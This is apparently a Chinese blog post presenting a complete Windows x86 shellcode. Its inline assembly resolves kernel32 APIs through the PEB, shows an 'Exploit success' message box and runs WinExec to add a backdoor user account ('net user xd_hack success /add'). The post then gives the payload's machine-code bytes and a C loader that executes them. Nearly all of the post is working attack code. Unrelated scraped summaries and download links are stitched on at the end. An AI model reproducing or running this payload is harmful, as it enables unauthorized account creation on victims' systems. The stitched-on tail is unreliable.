myShellcode

本文详细解析了一段复杂的shellcode代码,包括其机器码转换、调用函数、内存操作等关键步骤,旨在揭示shellcode如何实现特定功能,如获取模块地址、调用API函数、执行系统命令等。通过理解shellcode的工作原理,读者能够更好地掌握高级编程技巧和逆向工程知识。
#include <stdio.h>
//#include <WINDOWS.H>
#include <string.h>

void main(int argc, char **argv)
{
    _asm
    {
        push ebp    //压入ebp
        mov ebp,esp 
        sub esp,0x28   //申请10*4个空间保存临时结果
//------------------------------------------------------------------------

            //找到kernel32.dll的基地址,本机为0x7C800000
            push ebp
            mov ebp,esp
            xor ecx,ecx
            mov esi,fs:0x30
            mov esi,[esi + 0x0C]
            mov esi,[esi + 0x1C]
next_module:
            mov ebp,[esi + 0x08]
            mov edi,[esi + 0x20]
            mov esi,[esi]
            cmp [edi+0x18],cl
            jne next_module
            mov edi,ebp            //baseAddr  of Kernel32.dll
            pop ebp
//------------------------------------------------------------------------
//保存kernel32.dll的基地址,用于查找其他API
        mov [ebp - 0xC],edi               //找到kernel32.dll的基地址,本机为0x7C800000
//------------------------------------------------------------------------
            mov eax,[edi + 3ch]              //IMAGE_DOS_HEADER->e_lfanew
            mov edx,[edi + eax + 78h]         //_IMAGE_OPTIONAL_HEADER->IMAGE_DATA_DIRECTORY->VirtualAddress  导出表的RVA
            add edx,edi                       //_IMAGE_EXPORT_DIRECTORY导出表的首地址
            mov ecx,[edx +  18h]               //_IMAGE_EXPORT_DIRECTORY->NumberOfNames
            mov ebx,[edx + 20h]                 //_IMAGE_EXPORT_DIRECTORY->AddressOfNames
            add ebx,edi                      //AddressOfName            
search:
            dec ecx
            mov esi,[ebx+ecx*4]
            add esi,edi
            mov eax,0x50746547              //PteG("GetP")
            cmp [esi],eax
            jne search
            mov eax,0x41636f72              //Acor("rocA")
            cmp [esi+4],eax
            jne search
            mov ebx,[edx + 24h]
            add ebx,edi;                     //index address
            mov cx,[ebx + ecx*2]
            mov ebx,[edx + 1ch]
            add ebx,edi
            mov eax,[ebx + ecx*4]
            add eax,edi
//------------------------------------------------------------------------
//保存GetProcAddress的地址   其值为:0x7C80 AE30
        mov [ebp-0x8],eax
//------------------------------------------------------------------------
            //找到LoadLibraryA的地址
            mov edi,[ebp -  0xC]    //获得kernel32.dll的基地址
            mov eax,[edi + 3ch]              //IMAGE_DOS_HEADER->e_lfanew
            mov edx,[edi + eax + 78h]         //_IMAGE_OPTIONAL_HEADER->IMAGE_DATA_DIRECTORY->VirtualAddress  导出表的RVA
            add edx,edi                       //_IMAGE_EXPORT_DIRECTORY导出表的首地址
            mov ecx,[edx +  18h]               //_IMAGE_EXPORT_DIRECTORY->NumberOfNames
            mov ebx,[edx + 20h]                 //_IMAGE_EXPORT_DIRECTORY->AddressOfNames
            add ebx,edi                      //AddressOfName
find_loadlibrary:
            dec ecx
            mov esi,[ebx + ecx*4]
            add esi,edi;
            mov eax,0x64616F4C              //Load("daoL")
            cmp [esi],eax
            jne find_loadlibrary
            mov eax,0x7262694C              //Libr("rbiL")
            cmp [esi+4],eax
            jne find_loadlibrary
            mov eax,0x41797261               //aryA("Ayra")
            cmp [esi+8],eax
            jne find_loadlibrary
            mov ebx,[edx+24h]
            add ebx,edi;                     //index address
            mov cx,[ebx+ecx*2]
            mov ebx,[edx+1ch]
            add ebx,edi
            mov eax,[ebx+ecx*4]
            add eax,edi                      //eax 中保存LoadLibrary的地址
//------------------------------------------------------------------------
//保存LoadLibraryA的地址 本机值为0x7c801d7b
        mov [ebp - 0x4],eax
//------------------------------------------------------------------------
            //LoadLibraryA("user32.dll")

            mov eax,[ebp-0x4]

            push ebp
            mov ebp,esp
            xor ebx,ebx
            push ebx
            push ebx
            push ebx
            mov byte ptr[ebp-0xC],0x75           // 75 73 65 72 33 32 2E 64 6C 6C
            mov byte ptr[ebp-0xB],0x73
            mov byte ptr[ebp-0xA],0x65
            mov byte ptr[ebp-0x9],0x72
            mov byte ptr[ebp-0x8],0x33
            mov byte ptr[ebp-0x7],0x32
            mov byte ptr[ebp-0x6],0x2E
            mov byte ptr[ebp-0x5],0x64
            mov byte ptr[ebp-0x4],0x6C
            mov byte ptr[ebp-0x3],0x6C
            lea ebx,[ebp-0xC]
            push ebx                 //push "user32.dll"
            call eax
            add esp,0xC
            pop ebp
//------------------------------------------------------------------------
//保存user32.dll 的HMODULE
        mov [ebp-0x18],eax
//------------------------------------------------------------------------
            mov eax,[ebp-0x18]  //user32.dll->hModule
            mov edx,[ebp-0x8]   //edx->GetProcAddress
            //获得MessageBoxA的地址
            push ebp
            mov ebp,esp
            //edx->GetProcAddress(user32.dll->eax,MessageBoxA->ebx)
            xor ebx,ebx
            push ebx
            push ebx
            push ebx      // 4D 65 73 73 61 67 65 42 6F 78 41
            mov byte ptr[ebp-0xc],0x4D
            mov byte ptr[ebp-0xb],0x65
            mov byte ptr[ebp-0xa],0x73
            mov byte ptr[ebp-0x9],0x73
            mov byte ptr[ebp-0x8],0x61
            mov byte ptr[ebp-0x7],0x67
            mov byte ptr[ebp-0x6],0x65
            mov byte ptr[ebp-0x5],0x42
            mov byte ptr[ebp-0x4],0x6F
            mov byte ptr[ebp-0x3],0x78
            mov byte ptr[ebp-0x2],0x41
            lea ebx,[ebp-0xc]
            push ebx
            push eax
            call edx
            add esp,0xC
            pop ebp
//------------------------------------------------------------------------
//保存MessageBoxA的地址 本机为77D507EA
        mov [ebp-0x1c],eax
//------------------------------------------------------------------------
            //弹出一个消息框 MessageBoxA(0,"Exploit success","Overflow",0)
            push ebp
            mov ebp,esp
            xor ebx,ebx
            xor edx,edx
            push ebx
            push ebx
            push ebx
            push ebx
            push ebx  // 45 78 70 6C 6F 69 74 20 73 75 63 63 65 73 73
            mov byte ptr[ebp-0x10],0x45
            mov byte ptr[ebp-0x0f],0x78
            mov byte ptr[ebp-0xe],0x70
            mov byte ptr[ebp-0xd],0x6C
            mov byte ptr[ebp-0xc],0x6f
            mov byte ptr[ebp-0xb],0x69
            mov byte ptr[ebp-0xa],0x74
            mov byte ptr[ebp-0x9],0x20
            mov byte ptr[ebp-0x8],0x73
            mov byte ptr[ebp-0x7],0x75
            mov byte ptr[ebp-0x6],0x63
            mov byte ptr[ebp-0x5],0x63
            mov byte ptr[ebp-0x4],0x65
            mov byte ptr[ebp-0x3],0x73
            mov byte ptr[ebp-0x2],0x73
            lea ebx,[ebp-0x10]
            //push "Overflow"
            push 0x776F6C66
            push 0x7265764F
            mov edx,esp
            //MessageBoxA(0,ebx,edx,0)
            push 0
            push edx
            push ebx
            push 0
            call eax
            add esp,0x1c
            pop ebp
//------------------------------------------------------------------------
        //求WinExec的地址
        //eax->GetProcAddress(edx->kernel32.dll,ebx->WinExec)
        mov eax,[ebp-0x8]
        mov edx,[ebp-0xc]
        push ebp
        mov ebp,esp
        xor ebx,ebx
        push ebx
        push ebx  // 57 69 6E 45 78 65 63
        mov byte ptr[ebp-0x8],0x57
        mov byte ptr[ebp-0x7],0x69
        mov byte ptr[ebp-0x6],0x6e
        mov byte ptr[ebp-0x5],0x45
        mov byte ptr[ebp-0x4],0x78
        mov byte ptr[ebp-0x3],0x65
        mov byte ptr[ebp-0x2],0x63
        lea ebx,[ebp-0x8]
        push ebx
        push edx
        call eax
        add esp,0x08
        pop ebp
//------------------------------------------------------------------------
//保存WinExec的地址    
        mov [ebp-0x10],eax
//------------------------------------------------------------------------
            //WinExec("net user xd_hack success /add",SW_HIDE)
            mov eax,[ebp-0x10]
            push ebp
            mov ebp,esp
            xor ebx,ebx
            push ebx
            push ebx
            push ebx
            push ebx
            push ebx
            push ebx
            push ebx
            push ebx  // 6E 65 74 20 75 73 65 72 20 78 64 5F 68 61 63 6B 20 73 75 63 63 65 73 73 20 2F 61 64 64
            mov byte ptr[ebp-0x20],0x6E
            mov byte ptr[ebp-0x1f],0x65
            mov byte ptr[ebp-0x1e],0x74
            mov byte ptr[ebp-0x1d],0x20
            mov byte ptr[ebp-0x1c],0x75
            mov byte ptr[ebp-0x1b],0x73
            mov byte ptr[ebp-0x1a],0x65
            mov byte ptr[ebp-0x19],0x72
            mov byte ptr[ebp-0x18],0x20
            mov byte ptr[ebp-0x17],0x78
            mov byte ptr[ebp-0x16],0x64
            mov byte ptr[ebp-0x15],0x5f
            mov byte ptr[ebp-0x14],0x68
            mov byte ptr[ebp-0x13],0x61
            mov byte ptr[ebp-0x12],0x63
            mov byte ptr[ebp-0x11],0x6b
            mov byte ptr[ebp-0x10],0x20
            mov byte ptr[ebp-0x0f],0x73
            mov byte ptr[ebp-0x0e],0x75
            mov byte ptr[ebp-0x0d],0x63
            mov byte ptr[ebp-0x0c],0x63
            mov byte ptr[ebp-0x0b],0x65
            mov byte ptr[ebp-0x0a],0x73
            mov byte ptr[ebp-0x09],0x73
            mov byte ptr[ebp-0x08],0x20
            mov byte ptr[ebp-0x07],0x2f
            mov byte ptr[ebp-0x06],0x61
            mov byte ptr[ebp-0x05],0x64
            mov byte ptr[ebp-0x04],0x64
            lea ebx,[ebp-0x20]
            push 0
            push ebx
            call eax
            add esp,0x20
            pop ebp
//------------------------------------------------------------------------
            //求ExitProcess的地址
            //eax->GetProcAddress(edx->kernel32.dll,ebx->ExitProcess)
            mov eax,[ebp-0x8]
            mov edx,[ebp-0xc]
            push ebp
            mov ebp,esp
            xor ebx,ebx
            push ebx
            push ebx
            push ebx  // 45 78 69 74 50 72 6F 63 65 73 73
            mov byte ptr[ebp-0xc],0x45
            mov byte ptr[ebp-0xb],0x78
            mov byte ptr[ebp-0xa],0x69
            mov byte ptr[ebp-0x9],0x74
            mov byte ptr[ebp-0x8],0x50
            mov byte ptr[ebp-0x7],0x72
            mov byte ptr[ebp-0x6],0x6f
            mov byte ptr[ebp-0x5],0x63
            mov byte ptr[ebp-0x4],0x65
            mov byte ptr[ebp-0x3],0x73
            mov byte ptr[ebp-0x2],0x73
            lea ebx,[ebp-0xc]
            push ebx
            push edx
            call eax
            add esp,0xc
            pop ebp
//------------------------------------------------------------------------
//退出程序
            //平衡最开始申请的堆栈空间
            add esp,0x28
            pop ebp

            push 0
            call eax
//------------------------------------------------------------------------
        //add esp,0x28   //堆栈平衡
        //pop ebp     //弹出ebp
    }
}

对应的机器码

#include <stdio.h>    //printf
#include <string.h>   //strlen
 
char shellcode[] =
"\x55\x8B\xEC\x83\xEC\x28\x55\x8B\xEC\x33\xC9\x64\x8B"
"\x35\x30\x00\x00\x00\x8B\x76\x0C\x8B\x76\x1C\x8B\x6E\x08\x8B\x7E\x20\x8B\x36"
"\x38\x4F\x18\x75\xF3\x8B\xFD\x5D\x89\x7D\xF4\x8B\x47\x3C\x8B\x54\x07\x78\x03"
"\xD7\x8B\x4A\x18\x8B\x5A\x20\x03\xDF\x49\x8B\x34\x8B\x03\xF7\xB8\x47\x65\x74"
"\x50\x39\x06\x75\xF1\xB8\x72\x6F\x63\x41\x39\x46\x04\x75\xE7\x8B\x5A\x24\x03"
"\xDF\x66\x8B\x0C\x4B\x8B\x5A\x1C\x03\xDF\x8B\x04\x8B\x03\xC7\x89\x45\xF8\x8B"
"\x7D\xF4\x8B\x47\x3C\x8B\x54\x07\x78\x03\xD7\x8B\x4A\x18\x8B\x5A\x20\x03\xDF"
"\x49\x8B\x34\x8B\x03\xF7\xB8\x4C\x6F\x61\x64\x39\x06\x75\xF1\xB8\x4C\x69\x62"
"\x72\x39\x46\x04\x75\xE7\xB8\x61\x72\x79\x41\x39\x46\x08\x75\xDD\x8B\x5A\x24"
"\x03\xDF\x66\x8B\x0C\x4B\x8B\x5A\x1C\x03\xDF\x8B\x04\x8B\x03\xC7\x89\x45\xFC"
"\x8B\x45\xFC\x55\x8B\xEC\x33\xDB\x53\x53\x53\xC6\x45\xF4\x75\xC6\x45\xF5\x73"
"\xC6\x45\xF6\x65\xC6\x45\xF7\x72\xC6\x45\xF8\x33\xC6\x45\xF9\x32\xC6\x45\xFA"
"\x2E\xC6\x45\xFB\x64\xC6\x45\xFC\x6C\xC6\x45\xFD\x6C\x8D\x5D\xF4\x53\xFF\xD0"
"\x83\xC4\x0C\x5D\x89\x45\xE8\x8B\x45\xE8\x8B\x55\xF8\x55\x8B\xEC\x33\xDB\x53"
"\x53\x53\xC6\x45\xF4\x4D\xC6\x45\xF5\x65\xC6\x45\xF6\x73\xC6\x45\xF7\x73\xC6"
"\x45\xF8\x61\xC6\x45\xF9\x67\xC6\x45\xFA\x65\xC6\x45\xFB\x42\xC6\x45\xFC\x6F"
"\xC6\x45\xFD\x78\xC6\x45\xFE\x41\x8D\x5D\xF4\x53\x50\xFF\xD2\x83\xC4\x0C\x5D"
"\x89\x45\xE4\x55\x8B\xEC\x33\xDB\x33\xD2\x53\x53\x53\x53\x53\xC6\x45\xF0\x45"
"\xC6\x45\xF1\x78\xC6\x45\xF2\x70\xC6\x45\xF3\x6C\xC6\x45\xF4\x6F\xC6\x45\xF5"
"\x69\xC6\x45\xF6\x74\xC6\x45\xF7\x20\xC6\x45\xF8\x73\xC6\x45\xF9\x75\xC6\x45"
"\xFA\x63\xC6\x45\xFB\x63\xC6\x45\xFC\x65\xC6\x45\xFD\x73\xC6\x45\xFE\x73\x8D"
"\x5D\xF0\x68\x66\x6C\x6F\x77\x68\x4F\x76\x65\x72\x8B\xD4\x6A\x00\x52\x53\x6A"
"\x00\xFF\xD0\x83\xC4\x1C\x5D\x8B\x45\xF8\x8B\x55\xF4\x55\x8B\xEC\x33\xDB\x53"
"\x53\xC6\x45\xF8\x57\xC6\x45\xF9\x69\xC6\x45\xFA\x6E\xC6\x45\xFB\x45\xC6\x45"
"\xFC\x78\xC6\x45\xFD\x65\xC6\x45\xFE\x63\x8D\x5D\xF8\x53\x52\xFF\xD0\x83\xC4"
"\x08\x5D\x89\x45\xF0\x8B\x45\xF0\x55\x8B\xEC\x33\xDB\x53\x53\x53\x53\x53\x53"
"\x53\x53\xC6\x45\xE0\x6E\xC6\x45\xE1\x65\xC6\x45\xE2\x74\xC6\x45\xE3\x20\xC6"
"\x45\xE4\x75\xC6\x45\xE5\x73\xC6\x45\xE6\x65\xC6\x45\xE7\x72\xC6\x45\xE8\x20"
"\xC6\x45\xE9\x78\xC6\x45\xEA\x64\xC6\x45\xEB\x5F\xC6\x45\xEC\x68\xC6\x45\xED"
"\x61\xC6\x45\xEE\x63\xC6\x45\xEF\x6B\xC6\x45\xF0\x20\xC6\x45\xF1\x73\xC6\x45"
"\xF2\x75\xC6\x45\xF3\x63\xC6\x45\xF4\x63\xC6\x45\xF5\x65\xC6\x45\xF6\x73\xC6"
"\x45\xF7\x73\xC6\x45\xF8\x20\xC6\x45\xF9\x2F\xC6\x45\xFA\x61\xC6\x45\xFB\x64"
"\xC6\x45\xFC\x64\x8D\x5D\xE0\x6A\x00\x53\xFF\xD0\x83\xC4\x20\x5D\x8B\x45\xF8"
"\x8B\x55\xF4\x55\x8B\xEC\x33\xDB\x53\x53\x53\xC6\x45\xF4\x45\xC6\x45\xF5\x78"
"\xC6\x45\xF6\x69\xC6\x45\xF7\x74\xC6\x45\xF8\x50\xC6\x45\xF9\x72\xC6\x45\xFA"
"\x6F\xC6\x45\xFB\x63\xC6\x45\xFC\x65\xC6\x45\xFD\x73\xC6\x45\xFE\x73\x8D\x5D"
"\xF4\x53\x52\xFF\xD0\x83\xC4\x0C\x5D\x83\xC4\x28\x5D\x6A\x00\xFF\xD0\x5F\x5E"
"\x5B\x5D\xC3";
 
int main(int argc, char **argv)
{
   int (*func)();
   func = (int (*)()) &shellcode;
   printf("Shellcode Length is : %x \n",strlen(shellcode));
   (int)(*func)(); 
}

返回长度不对,实际长度为

700个字节。



下载方式:https://pan.quark.cn/s/a4b39357ea24 布线问题(分支限界算法)是计算机科学和电子工程领域中一个广为人知的议题,它主要探讨如何在印刷电路板上定位两个节点间最短的连接路径。 在这一议题中,电路板被构建为一个包含 n×m 个方格的矩阵,每个方格能够被界定为可通行或不可通行,其核心任务是定位从初始点到最终点的最短路径。 分支限界算法是处理布线问题的一种常用策略。 该算法与回溯法有相似之处,但存在差异,分支限界法仅需获取满足约束条件的一个最优路径,并按照广度优先或最小成本优先的原则来探索解空间树。 树 T 被构建为子集树或排列树,在探索过程中,每个节点仅被赋予一次成为扩展节点的机会,且会一次性生成其全部子节点。 针对布线问题的解决,队列式分支限界法可以被采用。 从起始位置 a 出发,将其设定为首个扩展节点,并将与该扩展节点相邻且可通行的方格加入至活跃节点队列中,将这些方格标记为 1,即从起始方格 a 到这些方格的距离为 1。 随后,从活跃节点队列中提取队首节点作为下一个扩展节点,并将与当前扩展节点相邻且未标记的方格标记为 2,随后将这些方格存入活跃节点队列。 这一过程将持续进行,直至算法探测到目标方格 b 或活跃节点队列为空。 在实现上述算法时,必须定义一个类 Position 来表征电路板上方格的位置,其成员 row 和 col 分别指示方格所在的行和列。 在方格位置上,布线能够沿右、下、左、上四个方向展开。 这四个方向的移动分别被记为 0、1、2、3。 下述表格中,offset[i].row 和 offset[i].col(i=0,1,2,3)分别提供了沿这四个方向前进 1 步相对于当前方格的相对位移。 在 Java 编程语言中,可以使用二维数组...
源码来自:https://pan.quark.cn/s/a4b39357ea24 在VC++开发过程中,对话框(CDialog)作为典型的用户界面组件,承担着与用户进行信息交互的重要角色。 在VS2008SP1的开发环境中,常常需要满足为对话框配置个性化背景图片的需求,以此来优化用户的操作体验。 本案例将系统性地阐述在CDialog框架下如何达成这一功能。 首先,需要在资源设计工具中构建一个新的对话框资源。 具体操作是在Visual Studio平台中,进入资源视图(Resource View)界面,定位到对话框(Dialog)分支,通过右键选择“插入对话框”(Insert Dialog)选项。 完成对话框内控件的布局设计后,对对话框资源进行保存。 随后,将着手进行背景图片的载入工作。 通常有两种主要的技术路径:1. **运用位图控件(CStatic)**:在对话框界面中嵌入一个CStatic控件,并将其属性设置为BST_OWNERDRAW,从而具备自主控制绘制过程的权限。 在对话框的类定义中,需要重写OnPaint()函数,负责调用图片资源并借助CDC对象将其渲染到对话框表面。 此外,必须合理处理WM_CTLCOLORSTATIC消息,确保背景图片的展示不会受到其他界面元素的干扰。 ```cppvoid CMyDialog::OnPaint(){ CPaintDC dc(this); // 生成设备上下文对象 CBitmap bitmap; bitmap.LoadBitmap(IDC_BITMAP_BACKGROUND); // 获取背景图片资源 CDC memDC; memDC.CreateCompatibleDC(&dc); CBitmap* pOldBitmap = m...
【集群划分】基于kmeans的电压调节的集群划分【IEEE33节点】内容概要:本文围绕基于KMeans算法的电压调节集群划分展开,以IEEE33节点配电网为研究对象,探讨含分布式光伏的配电网中电压协调控制问题。通过KMeans聚类算法将网络节点划分为若干电压调控集群,旨在降低电压越限风险、提升配电网运行稳定性。文中结合Matlab代码实现,详细展示了集群划分过程、聚类结果可视化及后续电压协调控制策略的设计思路,适用于电力系统中分布式能源接入带来的电压管理挑战。该方法有助于实现分区治理、优化资源配置,并为后续的分布式控制提供结构基础。; 适合人群:具备电力系统基础知识,熟悉Matlab编程,从事配电网优化、分布式能源管理或智能电网相关研究的研究生及科研人员;有一定机器学习背景的工程技术人员。; 使用场景及目标:①应用于含高渗透率光伏发电的配电网电压调控研究;②用于复现IEEE33节点系统中的集群划分与电压协调控制模型;③支撑科研论文复现、课题开发与算法验证,推动智能配电网的分区协同控制技术发展; 阅读建议:建议结合提供的Matlab代码进行实践操作,重点关注KMeans在电网拓扑数据上的特征选取与距离度量方式,理解聚类结果对电压控制性能的影响,并可进一步拓展至动态聚类或多目标优化集成。
先看效果: https://pan.quark.cn/s/92cf62472d7f 在C++编程领域中,**流类库与输入输出**构成了极为关键的基础元素,其主要功能在于管理程序与外部设备之间的数据传递。 流类库通过提供一系列丰富的类和函数,为这种数据交互提供了强大的支持,从而让开发人员能够便捷地完成输入输出任务。 ### 三种核心的输出流#### 1. `ostream``ostream`类作为一个输出流的对象,在流类库中扮演着核心的角色。 它通常用于将数据传输至标准输出设备(例如显示屏)。 `cout`作为一个预定义的`ostream`对象,主要用于标准输出。 ##### 特点:- 默认情况下与标准输出设备相连接。 - 能够重新指向其他输出设备,比如文件。 - 支持输出多种类型的数据,涵盖字符串、数字等。 - 提供了多样化的格式化输出选项。 #### 2. `ofstream``ofstream`类作为`ostream`的一个派生类,专门用于执行文件输出操作。 它使得开发人员能够将数据写入到磁盘文件中。 ##### 特点:- 在使用时自动打开文件以进行写入操作。 - 提供了多种文件打开模式,包括追加、覆盖等。 - 支持以二进制和文本两种模式进行输出。 - 能够方便地进行错误状态检测。 #### 3. `ostringstream``ostringstream`类同样是`ostream`的派生类,但它用于在内存中构建字符串流,而不是直接输出到显示屏幕或文件。 这对于需要动态生成字符串的应用场景非常适用。 ##### 特点:- 将输出结果暂存于内存之中。 - 可以转换为常规字符串格式。 - 适用于动态构建字符串序列。 - 常用于日志记录、数据格式化等场景。 ### 流的操作机制流可以被理解为一种“字节传...
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值